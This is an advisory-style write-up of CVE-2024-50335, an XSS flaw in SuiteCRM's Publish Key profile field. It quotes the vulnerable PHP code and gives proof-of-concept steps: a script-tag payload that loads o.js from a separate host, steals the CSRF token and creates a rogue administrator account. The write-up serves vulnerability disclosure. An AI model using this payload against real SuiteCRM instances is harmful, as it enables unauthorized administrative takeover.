# CVE-2024-50335: Authenticated XSS in "Publish Key" Field Allowing Unauthorized Administrator User Creation

### Summary

_The "Publish Key" field in SuiteCRM's Edit Profile page is vulnerable to Reflected Cross-Site Scripting (XSS), allowing an attacker to inject malicious JavaScript code. This can be exploited to steal CSRF tokens and perform unauthorized actions, such as creating new administrative users without proper authentication._

---
### Details

_The vulnerability arises due to insufficient input validation and sanitization of the Publish Key field within the SuiteCRM application. When an attacker injects a malicious script, it gets executed within the context of an authenticated user's session. The injected script (o.js) then leverages the captured CSRF token to forge requests that create new administrative users, effectively compromising the integrity and security of the CRM instance._

---
### Impact

**This vulnerability is a critical Cross-Site Scripting (XSS) issue. Its impact includes:**

1. Unauthorized Administrative Access: An attacker can create new administrative users, potentially gaining complete control over the CRM instance.
2. CSRF Token Theft: Allows for unauthorized actions to be performed on behalf of authenticated users.
3. Data Integrity Compromise: The ability to manipulate user accounts and settings can lead to data loss, leakage, or unauthorized modification.

---

### Vulnerable PHP Source Code

```PHP
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);

$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";

$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";

$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);
```
---
### PoC

1. Log in to SuiteCRM using valid Administrator credentials.
2. Navigate to Edit Profile: Access the Edit Profile page of the Administrator account.
3. In the "Publish Key" field under the Advanced tab, inject the following script:
```JS
<script src=//localhost:1235/o.js>
```
3. Ensure that o.js is hosted on a server at localhost on port 1235, serving the exploit code as described in the provided JavaScript code snippet.
5. Save the changes to the Administrator profile.
6. Upon reloading the SuiteCRM page, the malicious o.js script executes, stealing the CSRF token and using it to create a new administrative user with following credentials.
```
Username - imposter
Password - ok
```
7. Log in with the newly created administrative user credentials to verify successful exploitation.

https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197

---
### Reference 
- https://nvd.nist.gov/vuln/detail/CVE-2024-50335
- https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-8rw6-g96j-3w7m

